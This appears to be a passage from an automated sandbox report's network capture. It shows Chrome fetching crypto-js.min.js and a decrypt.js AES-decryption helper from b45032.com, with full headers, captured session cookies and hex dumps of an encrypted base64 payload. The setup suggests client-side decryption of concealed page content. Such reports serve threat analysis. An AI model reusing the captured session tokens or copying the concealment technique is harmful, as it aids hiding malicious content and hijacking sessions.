                                                      Data Ascii: FvQg85EPfkBXzhppWyJFrf6o06hao1TrH/13G84DzZjsiFdIA05uK60MRVW9i5UdgXloSfjtH5ecJa67WlATZufUZXo5tURE9ZR1iYx93EjMiygB+Usdf4NAsktnmVFMhGMe28Eym0NPRGXB0wwOuzCgIfYDOFVyV8/1VfFsorLoi5rodoXOPmL/Ygq3tIvKPcZk0i2bDcIWQclGNEeEX9ZgAhMqYwyzsC0TmRKIqhqJ7JSglTnSSk3eQL+SDaV
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 52 6e 64 47 6a 35 73 4e 49 37 39 2b 52 46 65 75 48 71 38 4e 72 72 37 4d 75 50 6f 57 52 53 75 6e 4d 6c 67 75 61 51 32 37 6a 2f 6f 31 64 4f 4f 33 6e 66 43 31 52 55 4b 4b 57 74 58 4e 52 51 77 79 62 73 6b 35 66 72 75 6d 2b 6a 6f 57 66 6f 4b 54 5a 75 37 4e 4c 67 4a 65 62 55 70 55 43 47 43 43 50 58 56 76 57 36 75 58 54 47 6e 75 69 37 2f 5a 50 41 70 36 76 2f 70 59 69 70 52 71 64 6c 4a 63 42 50 5a 75 6e 2b 48 4c 48 5a 4f 30 4e 69 30 52 6c 75 4b 6a 67 30 37 51 31 53 33 52 78 53 42 53 77 39 62 2b 58 79 47 6a 4d 38 5a 41 2b 32 30 58 35 76 2b 4d 49 71 31 43 37 6f 71 69 59 45 61 63 75 4b 68 64 50 5a 4f 55 6a 53 79 74 52 36 48 68 74 31 6f 6d 65 42 6b 34 4f 51 4a 49 42 47 5a 59 4f 69 33 48 6d 34 54 69 42 6d 4a 61 49 35 73 6c 35 58 54 34 44 55 4b 34 6f 6a 33 4d 30 36 6d
                                                      Data Ascii: RndGj5sNI79+RFeuHq8Nrr7MuPoWRSunMlguaQ27j/o1dOO3nfC1RUKKWtXNRQwybsk5frum+joWfoKTZu7NLgJebUpUCGCCPXVvW6uXTGnui7/ZPAp6v/pYipRqdlJcBPZun+HLHZO0Ni0RluKjg07Q1S3RxSBSw9b+XyGjM8ZA+20X5v+MIq1C7oqiYEacuKhdPZOUjSytR6Hht1omeBk4OQJIBGZYOi3Hm4TiBmJaI5sl5XT4DUK4oj3M06m
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 4a 36 55 77 49 4c 2b 34 4b 64 4a 33 77 49 51 73 41 47 4f 4d 56 63 33 6f 6d 41 74 78 63 49 7a 52 68 66 33 62 72 67 5a 39 68 6e 4e 72 34 5a 68 59 64 51 6f 44 4c 43 54 4f 68 51 45 45 72 42 66 63 44 6b 75 42 75 4e 32 5a 44 43 30 46 49 74 56 58 57 2b 46 66 53 4b 6b 34 6f 7a 73 38 77 71 4c 62 49 55 6b 50 73 64 36 73 64 7a 61 30 6c 75 2f 55 6b 71 38 42 33 50 47 66 4b 39 48 34 35 66 38 2f 78 38 75 46 72 74 38 73 67 68 42 75 38 33 46 33 61 73 45 6e 47 44 67 47 64 59 69 48 36 41 6f 2f 62 54 76 48 53 79 67 71 52 2f 2b 43 6b 53 47 44 6b 58 4e 4d 65 66 37 77 50 79 70 31 44 33 66 6a 4e 2b 51 55 6b 73 41 72 75 7a 59 46 51 6a 53 34 6b 32 77 63 46 45 4d 39 44 53 4e 4a 46 37 53 75 50 43 38 46 57 53 45 52 6c 38 72 69 36 55 73 6a 59 4a 32 77 58 4a 6f 4b 68 45 69 37 59 63 2f
                                                      Data Ascii: J6UwIL+4KdJ3wIQsAGOMVc3omAtxcIzRhf3brgZ9hnNr4ZhYdQoDLCTOhQEErBfcDkuBuN2ZDC0FItVXW+FfSKk4ozs8wqLbIUkPsd6sdza0lu/Ukq8B3PGfK9H45f8/x8uFrt8sghBu83F3asEnGDgGdYiH6Ao/bTvHSygqR/+CkSGDkXNMef7wPyp1D3fjN+QUksAruzYFQjS4k2wcFEM9DSNJF7SuPC8FWSERl8ri6UsjYJ2wXJoKhEi7Yc/
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 74 44 47 2f 6c 4f 66 72 2f 4b 75 50 43 74 6e 72 43 78 45 51 54 66 4a 43 32 6a 70 63 78 56 62 53 77 58 4e 78 71 5a 51 78 62 49 75 36 4e 44 42 62 62 4c 70 6e 75 48 33 53 39 47 34 38 55 30 62 4d 43 66 32 6c 54 79 58 50 4a 51 67 64 6d 52 45 44 4c 6c 4e 33 64 78 4b 2f 45 57 59 63 63 5a 39 70 4b 41 6d 54 64 76 30 4e 4f 69 7a 65 37 45 53 52 4b 50 49 32 6b 75 70 39 74 57 4c 52 4d 4b 63 63 47 68 32 74 74 56 32 69 47 62 62 4e 66 6d 43 47 70 54 52 6b 55 6a 51 45 6c 71 56 49 47 31 70 57 4b 56 6c 46 75 69 6d 62 5a 4a 58 53 35 33 4b 54 51 76 6e 5a 74 36 52 66 41 6e 75 79 6d 6f 4d 57 52 6e 55 4b 37 69 6e 39 38 2b 44 6d 56 73 47 76 52 59 38 35 30 51 57 38 53 51 48 77 36 50 66 42 65 34 59 4f 61 65 38 31 6c 46 71 6d 2f 51 2f 39 63 70 68 38 53 76 35 55 51 7a 30 6d 47 37 45
                                                      Data Ascii: tDG/lOfr/KuPCtnrCxEQTfJC2jpcxVbSwXNxqZQxbIu6NDBbbLpnuH3S9G48U0bMCf2lTyXPJQgdmREDLlN3dxK/EWYccZ9pKAmTdv0NOize7ESRKPI2kup9tWLRMKccGh2ttV2iGbbNfmCGpTRkUjQElqVIG1pWKVlFuimbZJXS53KTQvnZt6RfAnuymoMWRnUK7in98+DmVsGvRY850QW8SQHw6PfBe4YOae81lFqm/Q/9cph8Sv5UQz0mG7E
                                                      2025-01-12 23:47:37 UTC10768INData Raw: 5a 4b 52 43 79 71 57 4b 6c 6c 6c 46 56 61 51 0d 0a 32 39 66 32 0d 0a 4a 45 57 6d 6a 4d 4f 69 54 66 56 38 49 6f 65 67 6c 62 7a 31 51 77 6b 59 4c 41 30 63 55 46 4a 74 73 72 56 5a 4b 43 76 41 64 45 77 52 6f 49 76 57 39 41 4e 6f 66 48 70 4e 37 31 7a 4d 72 36 6e 45 49 34 66 34 6b 77 77 30 39 65 74 47 45 41 73 6f 55 6c 46 2b 73 50 6d 65 48 4a 46 4c 62 48 33 37 6d 46 72 44 73 4e 4f 4f 71 42 68 6e 45 68 53 69 4b 66 34 59 67 64 4e 62 79 54 58 36 68 78 78 57 74 54 4c 45 74 78 4a 50 6b 4d 70 72 62 59 73 57 65 6c 54 76 69 75 30 47 35 6e 48 71 4e 45 49 55 6f 67 6c 35 58 64 77 4d 59 39 66 30 56 67 54 34 4d 63 70 66 6b 68 63 57 65 50 67 49 36 75 34 33 6c 73 35 33 71 6f 45 4a 71 38 51 32 79 2f 4f 32 58 72 34 70 6e 51 4b 47 6a 61 63 35 6b 78 55 73 74 43 68 57 5a 6f 6a 6d
                                                      Data Ascii: ZKRCyqWKlllFVaQ29f2JEWmjMOiTfV8Ioeglbz1QwkYLA0cUFJtsrVZKCvAdEwRoIvW9ANofHpN71zMr6nEI4f4kww09etGEAsoUlF+sPmeHJFLbH37mFrDsNOOqBhnEhSiKf4YgdNbyTX6hxxWtTLEtxJPkMprbYsWelTviu0G5nHqNEIUogl5XdwMY9f0VgT4McpfkhcWePgI6u43ls53qoEJq8Q2y/O2Xr4pnQKGjac5kxUstChWZojm


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449741154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:37 UTC1131OUTGET /plus/js/unite/crypto-js.min.js HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:38 UTC416INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:37 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 47992
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Thu, 13 Jan 2022 09:57:13 GMT
                                                      ETag: "61dff779-bb78"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:38 UTC15968INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a 2c 56 2c 47 2c 4a
                                                      Data Ascii: !function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J
                                                      2025-01-12 23:47:38 UTC16384INData Raw: 32 34 7c 72 3e 3e 3e 38 29 2c 74 2e 73 69 67 42 79 74 65 73 3d 34 2a 28 65 2e 6c 65 6e 67 74 68 2b 31 29 2c 74 68 69 73 2e 5f 70 72 6f 63 65 73 73 28 29 3b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2c 6f 3d 6e 2e 77 6f 72 64 73 2c 73 3d 30 3b 73 3c 35 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 6f 5b 73 5d 3b 6f 5b 73 5d 3d 31 36 37 31 31 39 33 35 26 28 63 3c 3c 38 7c 63 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 63 3c 3c 32 34 7c 63 3e 3e 3e 38 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6c 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 2c 73 2e 52 49
                                                      Data Ascii: 24|r>>>8),t.sigBytes=4*(e.length+1),this._process();for(var n=this._hash,o=n.words,s=0;s<5;s++){var c=o[s];o[s]=16711935&(c<<8|c>>>24)|4278255360&(c<<24|c>>>8)}return n},clone:function(){var t=l.clone.call(this);return t._hash=this._hash.clone(),t}}),s.RI
                                                      2025-01-12 23:47:38 UTC15640INData Raw: 72 52 65 73 65 74 21 3d 3d 74 68 69 73 2e 5f 6b 65 79 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 6b 65 79 50 72 69 6f 72 52 65 73 65 74 3d 74 68 69 73 2e 5f 6b 65 79 2c 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e 73 69 67 42 79 74 65 73 2f 34 2c 69 3d 34 2a 28 31 2b 28 74 68 69 73 2e 5f 6e 52 6f 75 6e 64 73 3d 36 2b 72 29 29 2c 6e 3d 74 68 69 73 2e 5f 6b 65 79 53 63 68 65 64 75 6c 65 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 6f 3c 72 3f 6e 5b 6f 5d 3d 65 5b 6f 5d 3a 28 61 3d 6e 5b 6f 2d 31 5d 2c 6f 25 72 3f 36 3c 72 26 26 6f 25 72 3d 3d 34 26 26 28 61 3d 68 5b 61 3e 3e 3e 32 34 5d 3c 3c 32 34 7c 68 5b 61 3e 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 7c 68 5b 61 3e 3e 3e 38 26 32 35 35 5d 3c 3c 38 7c 68 5b 32 35 35 26 61 5d 29 3a 28 61 3d 68 5b
                                                      Data Ascii: rReset!==this._key){for(var t=this._keyPriorReset=this._key,e=t.words,r=t.sigBytes/4,i=4*(1+(this._nRounds=6+r)),n=this._keySchedule=[],o=0;o<i;o++)o<r?n[o]=e[o]:(a=n[o-1],o%r?6<r&&o%r==4&&(a=h[a>>>24]<<24|h[a>>>16&255]<<16|h[a>>>8&255]<<8|h[255&a]):(a=h[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449743154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:39 UTC1118OUTGET /js/www/decrypt.js HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:40 UTC390INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:40 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 531
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Fri, 17 Nov 2023 09:01:26 GMT
                                                      ETag: "65572be6-213"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:40 UTC531INData Raw: 66 75 6e 63 74 69 6f 6e 20 63 72 79 70 74 6f 4a 73 41 65 73 44 65 63 72 79 70 74 28 65 6e 63 72 79 70 74 65 64 2c 20 70 61 73 73 29 20 7b 0a 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 43 72 79 70 74 6f 4a 53 2e 53 48 41 32 35 36 28 70 61 73 73 29 3b 0a 20 20 20 20 76 61 72 20 69 76 41 6e 64 43 69 70 68 65 72 74 65 78 74 20 3d 20 43 72 79 70 74 6f 4a 53 2e 65 6e 63 2e 42 61 73 65 36 34 2e 70 61 72 73 65 28 65 6e 63 72 79 70 74 65 64 29 3b 0a 20 20 20 20 76 61 72 20 69 76 20 3d 20 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2e 63 72 65 61 74 65 28 69 76 41 6e 64 43 69 70 68 65 72 74 65 78 74 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 2c 20 34 29 29 3b 0a 20 20 20 20 76 61 72 20 63 69 70 68 65 72 74 65 78 74 20 3d 20 43 72 79 70 74 6f 4a
                                                      Data Ascii: function cryptoJsAesDecrypt(encrypted, pass) { var key = CryptoJS.SHA256(pass); var ivAndCiphertext = CryptoJS.enc.Base64.parse(encrypted); var iv = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(0, 4)); var ciphertext = CryptoJ


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449744154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:39 UTC960OUTGET /plus/js/unite/crypto-js.min.js HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:40 UTC416INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:40 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 47992
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Thu, 13 Jan 2022 09:57:13 GMT
                                                      ETag: "61dff779-bb78"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:40 UTC15968INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a 2c 56 2c 47 2c 4a
                                                      Data Ascii: !function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J
                                                      2025-01-12 23:47:42 UTC16384INData Raw: 32 34 7c 72 3e 3e 3e 38 29 2c 74 2e 73 69 67 42 79 74 65 73 3d 34 2a 28 65 2e 6c 65 6e 67 74 68 2b 31 29 2c 74 68 69 73 2e 5f 70 72 6f 63 65 73 73 28 29 3b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2c 6f 3d 6e 2e 77 6f 72 64 73 2c 73 3d 30 3b 73 3c 35 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 6f 5b 73 5d 3b 6f 5b 73 5d 3d 31 36 37 31 31 39 33 35 26 28 63 3c 3c 38 7c 63 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 63 3c 3c 32 34 7c 63 3e 3e 3e 38 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6c 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 2c 73 2e 52 49
                                                      Data Ascii: 24|r>>>8),t.sigBytes=4*(e.length+1),this._process();for(var n=this._hash,o=n.words,s=0;s<5;s++){var c=o[s];o[s]=16711935&(c<<8|c>>>24)|4278255360&(c<<24|c>>>8)}return n},clone:function(){var t=l.clone.call(this);return t._hash=this._hash.clone(),t}}),s.RI
                                                      2025-01-12 23:47:42 UTC15640INData Raw: 72 52 65 73 65 74 21 3d 3d 74 68 69 73 2e 5f 6b 65 79 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 6b 65 79 50 72 69 6f 72 52 65 73 65 74 3d 74 68 69 73 2e 5f 6b 65 79 2c 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e 73 69 67 42 79 74 65 73 2f 34 2c 69 3d 34 2a 28 31 2b 28 74 68 69 73 2e 5f 6e 52 6f 75 6e 64 73 3d 36 2b 72 29 29 2c 6e 3d 74 68 69 73 2e 5f 6b 65 79 53 63 68 65 64 75 6c 65 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 6f 3c 72 3f 6e 5b 6f 5d 3d 65 5b 6f 5d 3a 28 61 3d 6e 5b 6f 2d 31 5d 2c 6f 25 72 3f 36 3c 72 26 26 6f 25 72 3d 3d 34 26 26 28 61 3d 68 5b 61 3e 3e 3e 32 34 5d 3c 3c 32 34 7c 68 5b 61 3e 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 7c 68 5b 61 3e 3e 3e 38 26 32 35 35 5d 3c 3c 38 7c 68 5b 32 35 35 26 61 5d 29 3a 28 61 3d 68 5b
                                                      Data Ascii: rReset!==this._key){for(var t=this._keyPriorReset=this._key,e=t.words,r=t.sigBytes/4,i=4*(1+(this._nRounds=6+r)),n=this._keySchedule=[],o=0;o<i;o++)o<r?n[o]=e[o]:(a=n[o-1],o%r?6<r&&o%r==4&&(a=h[a>>>24]<<24|h[a>>>16&255]<<16|h[a>>>8&255]<<8|h[255&a]):(a=h[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449745154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC947OUTGET /js/www/decrypt.js HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:41 UTC390INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:41 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 531
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Fri, 17 Nov 2023 09:01:26 GMT
                                                      ETag: "65572be6-213"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
